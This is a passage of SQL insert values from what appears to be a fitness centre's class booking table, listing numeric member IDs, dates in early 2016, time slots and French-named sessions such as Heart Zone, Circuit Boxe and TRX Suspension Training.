(5901, 193, 'CTR', '2016-02-08', '18h15', '18h45', 'Heart Zone partie 1'),
(5902, 193, 'CTR', '2016-02-08', '18h45', '19h15', 'Heart Zone partie 2'),
(5903, 48, 'CTR', '2016-02-08', '18h15', '18h45', 'Heart Zone partie 1'),
(5904, 48, 'CTR', '2016-02-08', '18h45', '19h15', 'Heart Zone partie 2'),
(5905, 92, 'CTR', '2016-02-08', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5906, 92, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5917, 195, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5908, 195, 'CTR', '2016-02-08', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5909, 195, 'CTR', '2016-02-08', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5910, 195, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5963, 212, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(5962, 37, 'CTR', '2016-02-08', '17h30', '18h00', 'TRX Suspension Training'),
(5913, 173, 'CTR', '2016-02-08', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5914, 173, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5915, 180, 'CTR', '2016-02-08', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5916, 180, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5919, 14, 'CTR', '2016-02-08', '18h45', '19h15', 'Heart Zone partie 2'),
(5920, 14, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(5921, 14, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(5923, 35, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5925, 49, 'CTR', '2016-02-04', '12h45', '13h15', 'Circuit training'),
(5926, 218, 'CTR', '2016-02-04', '18h15', '18h45', 'Circuit Training'),
(5927, 80, 'CTR', '2016-02-06', '12h05', '12h35', 'Circuit Niveau 3'),
(5928, 80, 'CTR', '2016-02-06', '12h05', '12h35', 'Circuit Niveau 3'),
(5929, 132, 'CTR', '2016-02-06', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5930, 132, 'CTR', '2016-02-06', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5931, 80, 'CTR', '2016-02-06', '12h05', '12h35', 'Circuit Niveau 3'),
(5942, 213, 'CTR', '2016-02-14', '10h15', '10h45', 'Duo Training'),
(5941, 213, 'CTR', '2016-02-09', '19h00', '19h30', 'Duo Training'),
(5934, 80, 'CTR', '2016-02-06', '12h05', '12h35', 'Circuit Niveau 3'),
(5977, 48, 'CTR', '2016-02-10', '18h15', '18h45', 'Circuit Training'),
(5936, 218, 'CTR', '2016-02-08', '17h30', '18h00', 'TRX Suspension Training'),
(5943, 165, 'CTR', '2016-02-08', '20h30', '21h00', 'Circuit Training'),
(5944, 164, 'CTR', '2016-02-08', '20h30', '21h00', 'Circuit Training'),
(5945, 171, 'CTR', '2016-02-08', '20h30', '21h00', 'Circuit Training'),
(5946, 179, 'CTR', '2016-02-10', '18h15', '18h45', 'Circuit Training'),
(5947, 181, 'CTR', '2016-02-10', '18h15', '18h45', 'Circuit Training'),
(5948, 138, 'CTR', '2016-02-10', '18h15', '18h45', 'Circuit Training'),
(5949, 92, 'CTR', '2016-02-10', '18h15', '18h45', 'Circuit Training'),
(5979, 29, 'CTR', '2016-02-10', '17h30', '18h', 'TRX Suspension Training'),
(5951, 195, 'CTR', '2016-02-10', '18h15', '18h45', 'Circuit Training'),
(6052, 210, 'CTR', '2016-02-13', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6053, 210, 'CTR', '2016-02-13', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5954, 168, 'CTR', '2016-02-10', '19h ', '19h30', 'Circuit training'),
(5955, 196, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(5956, 180, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(6007, 80, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(5958, 173, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(6006, 204, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(5960, 188, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(5961, 188, 'CTR', '2016-02-10', '20h30', '21h', 'Circuit Training'),
(5964, 32, 'CTR', '2016-02-08', '18h15', '18h45', 'Heart Zone partie 1'),
(5965, 32, 'CTR', '2016-02-08', '18h45', '19h15', 'Heart Zone partie 2'),
(5966, 32, 'CTR', '2016-02-08', '17h30', '18h00', 'TRX Suspension Training'),
(5967, 142, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(5968, 143, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(5969, 222, 'CTR', '2016-02-08', '17h30', '18h00', 'TRX Suspension Training'),
(5970, 223, 'CTR', '2016-02-10', '17h30', '18h', 'TRX Suspension Training'),
(5971, 80, 'CTR', '2016-02-10', '17h30', '18h', 'TRX Suspension Training'),
(5972, 217, 'CTR', '2016-02-10', '17h30', '18h', 'TRX Suspension Training'),
(5973, 192, 'CTR', '2016-02-08', '17h30', '18h00', 'TRX Suspension Training'),
(5974, 30, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5975, 30, 'CTR', '2016-02-08', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5976, 191, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(5978, 48, 'CTR', '2016-02-10', '17h30', '18h', 'TRX Suspension Training'),
(5983, 41, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(5981, 41, 'CTR', '2016-02-22', '18h15', '18h45', 'Heart Zone partie 1'),
(5982, 41, 'CTR', '2016-02-22', '18h45', '19h15', 'Heart Zone partie 2'),
(5984, 41, 'CTR', '2016-02-25', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(5985, 41, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(5986, 41, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(5987, 31, 'CTR', '2016-02-13', '10h50', '11h20', 'Circuit Niveau 2 A'),
(5988, 31, 'CTR', '2016-02-13', '11h30', '12h00', 'Circuit Niveau 2 B'),
(5989, 218, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(5990, 195, 'CTR', '2016-02-15', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5991, 195, 'CTR', '2016-02-15', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5992, 195, 'CTR', '2016-02-15', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5993, 195, 'CTR', '2016-02-15', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5994, 173, 'CTR', '2016-02-15', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5995, 173, 'CTR', '2016-02-15', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5996, 180, 'CTR', '2016-02-15', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5997, 180, 'CTR', '2016-02-15', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(5998, 92, 'CTR', '2016-02-15', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5999, 92, 'CTR', '2016-02-15', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6000, 48, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(6001, 48, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(6061, 193, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6080, 14, 'CTR', '2016-02-22', '18h15', '18h45', 'Heart Zone partie 1'),
(6004, 138, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(6005, 138, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(6008, 48, 'CTR', '2016-02-13', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6009, 48, 'CTR', '2016-02-13', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6010, 35, 'CTR', '2016-02-11', '12h45', '13h15', 'Circuit training'),
(6013, 41, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(6026, 28, 'CTR', '2016-02-11', '12h45', '13h15', 'Circuit training'),
(6016, 210, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(6017, 29, 'CTR', '2016-02-11', '18h15', '18h45', 'Circuit Training'),
(6018, 189, 'CTR', '2016-02-11', '12h45', '13h15', 'Circuit training'),
(6019, 205, 'CTR', '2016-02-11', '12h45', '13h15', 'Circuit training'),
(6020, 105, 'CTR', '2016-02-11', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6021, 192, 'CTR', '2016-02-13', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6022, 192, 'CTR', '2016-02-13', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6024, 35, 'CTR', '2016-02-13', '10h15', '10h45', 'Circuit Niveau 1'),
(6025, 35, 'CTR', '2016-02-13', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6027, 199, 'CTR', '2016-02-11', '12h45', '13h15', 'Circuit training'),
(6028, 179, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6029, 182, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6030, 183, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6031, 181, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6032, 168, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6033, 171, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6034, 165, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6035, 164, 'CTR', '2016-02-17', '19h ', '19h30', 'Circuit training'),
(6036, 48, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6037, 195, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6038, 195, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6039, 225, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6040, 196, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6041, 180, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6042, 188, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6043, 188, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6044, 204, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6045, 173, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6046, 212, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6047, 60, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6048, 222, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6049, 221, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6050, 132, 'CTR', '2016-02-17', '20h30', '21h', 'Circuit Training'),
(6051, 48, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6054, 210, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(6055, 210, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(6056, 192, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6057, 192, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6058, 192, 'CTR', '2016-02-20', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6059, 192, 'CTR', '2016-02-20', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6062, 193, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6063, 32, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(6064, 32, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(6065, 217, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6066, 30, 'CTR', '2016-02-15', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6067, 30, 'CTR', '2016-02-15', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6068, 191, 'CTR', '2016-02-18', '18h15', '18h45', 'Circuit Training'),
(6069, 37, 'CTR', '2016-02-15', '18h15', '18h45', 'Heart Zone partie 1'),
(6070, 37, 'CTR', '2016-02-15', '18h45', '19h15', 'Heart Zone partie 2'),
(6071, 213, 'CTR', '2016-02-16', '19h00', '19h30', 'Duo Training'),
(6072, 213, 'CTR', '2016-02-21', '10h15', '10h45', 'Duo Training'),
(8484, 48, 'CTR', '2016-11-30', '19h ', '19h30', 'Circuit training'),
(6074, 31, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6075, 31, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6076, 216, 'CTR', '2016-02-17', '17h30', '18h', 'TRX Suspension Training'),
(6077, 216, 'CTR', '2016-02-18', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6078, 211, 'CTR', '2016-02-18', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6114, 132, 'CTR', '2016-02-20', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6081, 14, 'CTR', '2016-02-22', '18h45', '19h15', 'Heart Zone partie 2'),
(6082, 48, 'CTR', '2016-02-22', '18h15', '18h45', 'Heart Zone partie 1'),
(6083, 48, 'CTR', '2016-02-22', '18h45', '19h15', 'Heart Zone partie 2'),
(6084, 32, 'CTR', '2016-02-22', '18h15', '18h45', 'Heart Zone partie 1'),
(6085, 32, 'CTR', '2016-02-22', '18h45', '19h15', 'Heart Zone partie 2'),
(6120, 222, 'CTR', '2016-02-24', '17h30', '18h', 'TRX Suspension Training'),
(6088, 138, 'CTR', '2016-02-22', '18h15', '18h45', 'Heart Zone partie 1'),
(6089, 138, 'CTR', '2016-02-22', '18h45', '19h15', 'Heart Zone partie 2'),
(6090, 173, 'CTR', '2016-02-22', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6091, 173, 'CTR', '2016-02-22', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6092, 195, 'CTR', '2016-02-22', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6093, 195, 'CTR', '2016-02-22', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6094, 195, 'CTR', '2016-02-22', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6095, 195, 'CTR', '2016-02-22', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6149, 31, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6148, 31, 'CTR', '2016-02-24', '17h30', '18h', 'TRX Suspension Training'),
(6098, 180, 'CTR', '2016-02-22', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6099, 180, 'CTR', '2016-02-22', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6153, 217, 'CTR', '2016-02-25', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6152, 191, 'CTR', '2016-02-25', '18h15', '18h45', 'Circuit Training'),
(6102, 213, 'CTR', '2016-02-23', '19h00', '19h30', 'Duo Training'),
(6103, 210, 'CTR', '2016-02-18', '18h15', '18h45', 'Circuit Training'),
(6104, 92, 'CTR', '2016-02-17', '18h15', '18h45', 'Circuit Training'),
(6105, 44, 'CTR', '2016-02-18', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6113, 189, 'CTR', '2016-02-18', '12h00', '12h30', 'Circuit training'),
(6107, 205, 'CTR', '2016-02-18', '12h00', '12h30', 'Circuit training'),
(6108, 80, 'CTR', '2016-02-18', '12h00', '12h30', 'Circuit training'),
(6110, 140, 'CTR', '2016-02-18', '12h00', '12h30', 'Circuit training'),
(6111, 143, 'CTR', '2016-02-18', '18h15', '18h45', 'Circuit Training'),
(6112, 142, 'CTR', '2016-02-18', '18h15', '18h45', 'Circuit Training'),
(6115, 132, 'CTR', '2016-02-20', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6116, 31, 'CTR', '2016-02-20', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6117, 31, 'CTR', '2016-02-20', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6118, 218, 'CTR', '2016-02-18', '18h15', '18h45', 'Circuit Training'),
(6119, 105, 'CTR', '2016-02-18', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6121, 221, 'CTR', '2016-02-24', '17h30', '18h', 'TRX Suspension Training'),
(6122, 48, 'CTR', '2016-02-20', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6123, 168, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6124, 164, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6125, 171, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6126, 165, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6127, 212, 'CTR', '2016-02-24', '20h30', '21h', 'Circuit Training'),
(6128, 60, 'CTR', '2016-02-24', '20h30', '21h', 'Circuit Training'),
(6129, 188, 'CTR', '2016-02-24', '20h30', '21h', 'Circuit Training'),
(6186, 35, 'CTR', '2016-02-25', '12h45', '13h15', 'Circuit training'),
(6131, 196, 'CTR', '2016-02-24', '20h30', '21h', 'Circuit Training'),
(6132, 180, 'CTR', '2016-02-24', '20h30', '21h', 'Circuit Training'),
(6133, 195, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6134, 195, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6135, 210, 'CTR', '2016-02-20', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6136, 210, 'CTR', '2016-02-20', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6137, 193, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6138, 193, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6139, 48, 'CTR', '2016-02-20', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6140, 192, 'CTR', '2016-02-24', '17h30', '18h', 'TRX Suspension Training'),
(6141, 192, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6230, 193, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6227, 164, 'CTR', '2016-03-02', '17h30', '18h', 'TRX Suspension Training'),
(6234, 211, 'CTR', '2016-03-03', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6146, 41, 'CTR', '2016-03-09', '19h ', '19h30', 'Circuit training'),
(6147, 41, 'CTR', '2016-03-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6150, 210, 'CTR', '2016-02-25', '18h15', '18h45', 'Circuit Training'),
(6179, 14, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6154, 211, 'CTR', '2016-02-25', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6155, 216, 'CTR', '2016-02-25', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6156, 140, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6157, 173, 'CTR', '2016-02-24', '20h30', '21h', 'Circuit Training'),
(6158, 142, 'CTR', '2016-02-25', '18h15', '18h45', 'Circuit Training'),
(6159, 143, 'CTR', '2016-02-25', '18h15', '18h45', 'Circuit Training'),
(6160, 14, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6161, 14, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6162, 48, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6163, 48, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6210, 188, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6166, 180, 'CTR', '2016-02-29', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6167, 180, 'CTR', '2016-02-29', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6168, 173, 'CTR', '2016-02-29', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6169, 173, 'CTR', '2016-02-29', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6170, 195, 'CTR', '2016-02-29', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6171, 195, 'CTR', '2016-02-29', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6172, 195, 'CTR', '2016-02-29', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6173, 195, 'CTR', '2016-02-29', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6174, 213, 'CTR', '2016-02-28', '10h15', '10h45', 'Duo Training'),
(6175, 213, 'CTR', '2016-03-01', '19h00', '19h30', 'Duo Training'),
(6176, 48, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6177, 48, 'CTR', '2016-02-24', '17h30', '18h', 'TRX Suspension Training'),
(6178, 138, 'CTR', '2016-02-24', '19h ', '19h30', 'Circuit training'),
(6180, 92, 'CTR', '2016-02-24', '18h15', '18h45', 'Circuit Training'),
(6181, 14, 'CTR', '2016-03-02', '19h ', '19h30', 'Circuit training'),
(6209, 132, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6184, 138, 'CTR', '2016-03-02', '18h15', '18h45', 'Circuit Training'),
(6185, 209, 'CTR', '2016-02-25', '19h00', '19h30', 'Personal Training'),
(6187, 212, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6188, 212, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6195, 218, 'CTR', '2016-02-25', '18h15', '18h45', 'Circuit Training'),
(6196, 44, 'CTR', '2016-02-25', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6191, 56, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6192, 56, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6193, 60, 'CTR', '2016-02-29', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6194, 60, 'CTR', '2016-02-29', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6197, 105, 'CTR', '2016-02-25', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6198, 48, 'CTR', '2016-02-27', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6199, 48, 'CTR', '2016-02-27', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6200, 31, 'CTR', '2016-02-27', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6201, 31, 'CTR', '2016-02-27', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6202, 192, 'CTR', '2016-02-27', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6203, 192, 'CTR', '2016-02-27', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6204, 92, 'CTR', '2016-02-29', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6205, 92, 'CTR', '2016-02-29', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6206, 92, 'CTR', '2016-03-02', '18h15', '18h45', 'Circuit Training'),
(6207, 228, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6208, 228, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6211, 188, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6212, 196, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6213, 173, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6214, 180, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6215, 204, 'CTR', '2016-03-02', '20h30', '21h', 'Circuit Training'),
(6216, 229, 'CTR', '2016-02-29', '18h15', '18h45', 'Heart Zone partie 1'),
(6217, 229, 'CTR', '2016-02-29', '18h45', '19h15', 'Heart Zone partie 2'),
(6218, 210, 'CTR', '2016-03-03', '18h15', '18h45', 'Circuit Training'),
(6219, 48, 'CTR', '2016-03-02', '17h30', '18h', 'TRX Suspension Training'),
(6220, 31, 'CTR', '2016-03-02', '17h30', '18h', 'TRX Suspension Training'),
(6221, 48, 'CTR', '2016-03-02', '18h15', '18h45', 'Circuit Training'),
(6222, 31, 'CTR', '2016-03-02', '18h15', '18h45', 'Circuit Training'),
(6223, 195, 'CTR', '2016-03-02', '18h15', '18h45', 'Circuit Training'),
(6224, 140, 'CTR', '2016-03-02', '18h15', '18h45', 'Circuit Training'),
(6317, 192, 'CTR', '2016-03-09', '17h30', '18h', 'TRX Suspension Training'),
(6226, 217, 'CTR', '2016-03-02', '17h30', '18h', 'TRX Suspension Training'),
(6228, 48, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6229, 48, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6231, 193, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6232, 193, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6233, 218, 'CTR', '2016-03-03', '18h15', '18h45', 'Circuit Training'),
(6235, 191, 'CTR', '2016-03-03', '18h15', '18h45', 'Circuit Training'),
(6236, 228, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6237, 228, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6238, 63, 'CTR', '2016-03-02', '17h30', '18h', 'TRX Suspension Training'),
(6239, 205, 'CTR', '2016-03-02', '19h ', '19h30', 'Circuit training'),
(6240, 31, 'CTR', '2016-03-05', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6241, 31, 'CTR', '2016-03-05', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6242, 171, 'CTR', '2016-03-02', '17h30', '18h', 'TRX Suspension Training'),
(6243, 168, 'CTR', '2016-03-02', '19h ', '19h30', 'Circuit training'),
(6244, 134, 'CTR', '2016-03-03', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(6245, 205, 'CTR', '2016-03-02', '19h45', '20h15', 'Clubs Sportifs'),
(6246, 205, 'CTR', '2016-03-03', '12h00', '12h30', 'Circuit training'),
(6247, 189, 'CTR', '2016-03-03', '12h00', '12h30', 'Circuit training'),
(6248, 188, 'CTR', '2016-03-03', '12h00', '12h30', 'Circuit training'),
(6249, 41, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6250, 41, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6251, 229, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6252, 229, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6253, 138, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6254, 138, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6255, 14, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6256, 14, 'CTR', '2016-03-07', '18h45', '19h15', 'Heart Zone partie 2'),
(6257, 227, 'CTR', '2016-03-07', '18h15', '18h45', 'Heart Zone partie 1'),
(6272, 230, 'CTR', '2016-03-05', '10h15', '10h45', 'Circuit Niveau 1'),
(6259, 92, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6260, 92, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6261, 173, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6262, 173, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6263, 195, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6264, 195, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6265, 195, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6266, 195, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6267, 210, 'CTR', '2016-03-05', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6268, 210, 'CTR', '2016-03-05', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6269, 105, 'CTR', '2016-03-03', '18h15', '18h45', 'Circuit Training'),
(6270, 48, 'CTR', '2016-03-05', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6271, 48, 'CTR', '2016-03-05', '11h30', '12h00', 'Circuit Niveau 2 B'),
(6273, 44, 'CTR', '2016-03-05', '10h15', '10h45', 'Circuit Niveau 1'),
(6274, 205, 'CTR', '2016-03-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(6275, 205, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
(6276, 230, 'CTR', '2016-03-09', '19h ', '19h30', 'Circuit training'),
(6277, 230, 'CTR', '2016-03-12', '10h50', '11h20', 'Circuit Niveau 2 A'),
(6278, 138, 'CTR', '2016-03-09', '18h15', '18h45', 'Circuit Training'),
(6279, 14, 'CTR', '2016-03-09', '19h ', '19h30', 'Circuit training'),
(6280, 30, 'CTR', '2016-03-07', '19h45', '20h15', 'Circuit Boxe Partie 2'),
